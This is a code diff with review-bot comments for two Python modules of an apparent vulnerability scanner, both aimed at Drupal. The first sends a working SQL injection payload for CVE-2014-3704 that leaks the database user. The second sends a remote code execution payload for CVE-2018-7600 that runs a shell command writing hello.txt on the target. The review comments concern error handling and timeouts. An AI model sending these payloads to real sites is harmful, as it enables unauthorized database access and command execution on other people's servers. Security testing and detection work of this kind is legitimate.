fix
@@ -1,8 +1,6 @@
|
|||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from bs4 import BeautifulSoup
|
from bs4 import BeautifulSoup
|
||||||
import requests
|
import requests
|
||||||
import re
|
|
||||||
|
|
||||||
'''
|
'''
|
||||||
Usage:
|
Usage:
|
||||||
@@ -10,27 +8,28 @@ Usage:
|
|||||||
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)
|
||||||
'''
|
'''
|
||||||
|
|
||||||
|
|
||||||
def attack(URL):
|
def attack(URL):
|
||||||
url = URL+'/?q=node&destination=node'
|
url = URL+'/?q=node&destination=node'
|
||||||
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
print('[+]开始检测-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||||
|
|
||||||
user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
|
||||||
Content_Type="application/x-www-form-urlencoded"
|
Content_Type = "application/x-www-form-urlencoded"
|
||||||
headers={"User-Agent":user_agent,"Content-Type":Content_Type}
|
headers = {"User-Agent":user_agent,"Content-Type":Content_Type}
|
||||||
|
|
||||||
data ='pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
data = 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a'
|
||||||
try:
|
try:
|
||||||
r = requests.post(url,data=data, headers=headers, verify=False)
|
r = requests.post(url,data=data, headers=headers, verify=False)
|
||||||
soup=BeautifulSoup(r.content,"lxml")
|
soup = BeautifulSoup(r.content,"lxml")
|
||||||
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
print('请查看以下内容中是否有 用户名+@+IP 的注入结果:')
|
||||||
print('--------------------')
|
print('--------------------')
|
||||||
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
print(str(soup.find_all('li')[2])[100:135])#截取注入结果的那一段字符出来
|
||||||
print('--------------------')
|
print('--------------------')
|
||||||
except:
|
except Exception:
|
||||||
print('someerror!')
|
print('someerror!')
|
||||||
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
print('[+]检测结束-Drupal < 7.32 “Drupalgeddon” SQL注入漏洞(CVE-2014-3704)。[+]')
|
||||||
print('\n')
|
print('\n')
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
attack()
|
attack()
|
||||||
|
|
||||||
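Review bot: The `if __name__ == "__main__":` block still calls `attack()` with no argument although the signature is `def attack(URL):`, so running this file directly raises TypeError before any check runs; pass a URL parsed from the command line or drop the block. In the same function, `requests.post(url,data=data, headers=headers, verify=False)` has no `timeout`, so one unresponsive host stalls the whole scan; adding `timeout=10` would bound it. The narrowed `except Exception:` still turns an IndexError from `soup.find_all('li')[2]` into 'someerror!', so a response without the expected list items (probably a patched site) is reported the same way as a network failure; checking the length of the `li` list first and printing a distinct negative result would make the output reliable. The function body spans both hunks of this file.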
|
|||||||
@@ -7,9 +7,11 @@ Usage:
|
|||||||
moon.py -u drupal http://127.0.0.1:8080
|
moon.py -u drupal http://127.0.0.1:8080
|
||||||
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)
|
||||||
'''
|
'''
|
||||||
|
|
||||||
|
|
||||||
def attack(URL):
|
def attack(URL):
|
||||||
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
print('[+]开始检测-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||||
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
url = URL + '/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
|
||||||
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "^w^" | tee hello.txt'}
|
||||||
# print(url)
|
# print(url)
|
||||||
try:
|
try:
|
||||||
@@ -18,11 +20,11 @@ def attack(URL):
|
|||||||
if check.status_code != 200:
|
if check.status_code != 200:
|
||||||
sys.exit("Not exploitable")
|
sys.exit("Not exploitable")
|
||||||
print('error!')
|
print('error!')
|
||||||
print ('可能存在漏洞-Check: '+ URL +'/hello.txt ^w^')
|
print('可能存在漏洞-Check: ' + URL + '/hello.txt ^w^')
|
||||||
except:
|
except:
|
||||||
print('someerroe!')
|
print('someerroe!')
|
||||||
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
print('[+]检测结束-Drupal Drupalgeddon 2远程代码执行漏洞(CVE-2018-7600)。[+]')
|
||||||
print('\n')
|
print('\n')
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
attack()
|
attack()
|
||||||
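Review bot: The bare `except:` kept in this file also catches the SystemExit raised by `sys.exit("Not exploitable")`, which appears to sit inside the `try:` opened in the previous hunk, so a non-200 response would print 'someerroe!' instead of the intended message. Use `except Exception:` as the commit does in the other file, and replace the `sys.exit(...)` with a `print` plus `return` so that a caller importing `attack` is not terminated. Indentation is lost in this view, so whether `print('error!')` is reachable after the exit cannot be confirmed. The check is also not read-only: the `mail[#markup]` value writes `hello.txt` on the scanned host and nothing removes it, which deserves a line in the module docstring so that operators clean up and defenders know which artifact to look for. `attack()` under `__main__` is again called without the required `URL`.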
|
|||||||